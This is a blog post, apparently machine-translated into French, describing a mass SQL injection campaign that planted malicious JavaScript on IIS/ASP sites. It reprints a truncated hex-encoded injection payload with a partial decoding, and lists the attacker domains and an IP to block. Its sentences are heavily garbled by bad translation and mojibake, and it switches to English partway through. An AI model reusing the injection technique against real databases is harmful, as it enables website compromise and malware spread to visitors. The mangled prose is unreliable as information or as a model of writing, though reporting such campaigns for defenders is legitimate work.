Injections de masse de SQL
Plus tôt cette semaine j'ai édité a poteau concernant une vulnérabilité dans plusieurs versions de Microsoft Windows…
… Bon la vulnérabilité maintenant est exécutée-là est un autre rond des injections de masse de SQL allant sur ce qui a infecté des centaines de milliers de sites Web fonctionnant sur la plateforme d'IIS.
En préformant un Google simple recherchez les traces des résultats malveillants de manuscrit dans plus de 510.000 pages modifiées.
Avec de plus en plus des sites Web en utilisant un SQL principal pour les rendre plus rapides et plus dynamiques, il également moyens qu'il est crucial de vérifier ce que l'information obtiennent entreposée dedans ou demandé à partir de ces bases de données - particulièrement si vous permettez aux utilisateurs de télécharger le contenu eux-mêmes qui se produit toute heure sous les forum de discussion, les blogs, les formes etc. de rétroaction. À moins que ces données soient aseptisées avant qu'elles obtiennent vous aient sauvé ne puissent pas commander ce que le site Web montrera aux utilisateurs. C'est ce qui est l'injection de SQL tout environ, exploitant des faiblesses dans ces commandes.
Actuellement le dossier malveillant qui est injecté est 1.js cependant qu'il doit noter que ceci pourrait changer à n'importe quelle étape. Les visiteurs à ce site Web sont € de œtreated†d'â à 8 exploits différentes pour beaucoup d'applications basées par fenêtres comprenant le BUT, RealPlayer, et iTunes. PASvisitez les emplacements que lien à cet emplacement car vous êtes très pour obtenir infecté. Trendmicro a appelé le malware toj_agent.KAQ qu'il observe pour des mots de passe et les passe de nouveau à l'IP€ de ™s de contollerâ.
Dans ce cas-ci le code d'injection commence comme ceci (la note, ceci n'est pas le code complet) :
   DECLARE%20@S%20NVARCHAR (4000) ; SET%20@S=CAST (le ¦ de 0x440045004300    4C00410052004500200040005400200076006100720063006800610072    00280032003500350029002C0040004300200076006100720063006800    610072002800320035003500290020004400450043004C004100520045    0020005400610062006C0065005F0043007500720073006F0072002000    43005500520053004F005200200046004F0052002000730065006C0065    0063007400200061002E006E0061006D0065002C0062002E006E006100    6D0065002000660072006F006D0020007300790073006F0062006A0065    00630074007300200061002C0073007900730063006F006C0075006D00    6E00730020006200200077006800650072006500200061002E00690064    003D0062002E0069006400200061006E006400200061002E0078007400    7900700065003D00270075002700200061006E0064002000280062002E    00780074007900700065003D003900390020006F007200200062002E00   € 780074007900700065003D003300350020006â qui une fois décodé devient :    DÉCLARENT le @T (255) le '@C que varchar varchar (255) DÉCLARENT LE CURSEUR de Table_Cursor    POUR a.name'b.name choisi des a'syscolumns b    de sysobjects où a.id=b.id et a.xtype='u et (b.xtype=99 ou b.xtype=35    ou ¦€ de bâ
Que se produit en conséquence ? Il trouve tous les gisements des textes dans la base de données et ajoute un lien au Javascript malveillant à chacun de eux ce qui fera votre site Web les montrer automatiquement. Tellement essentiellement ce qui se sont produits était que les attaquants ont recherché des pages d'asp ou d'ASPX contenant n'importe quel type (une valeur dynamique telle qu'une identification d'article, une identité de produit, et un cetera) de paramètre querystring et ont essayé d'employer cela pour télécharger leur code d'injection de SQL.
Jusqu'ici trois domaines différents ont été employés pour accueillir l'â content malveillant€ » nmidahena.com, aspder.com et nihaorr1.com. Il y a un ensemble de dossiers qui obtient chargé de ces emplacements qui essaye d'employer différentes exploits pour installer un jeu en ligne Trojan.
En ce moment la page initiale d'exploit sur tous les domaines sont inaccessible mais cela pourrait changer. So if you’re a firewall administrator we recommend you to block access to them.
I would recommend that Administrators block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.
Info sourced from f-secure
Written by Patrick S. Read more great feeds at is source WEBSITE
no comments.
Read more articles on otherSoftware and MS News.
- [+] Digg: Feature this article
- [+] Del.icio.us: Bookmark this article
- [+] Furl: Bookmark this article
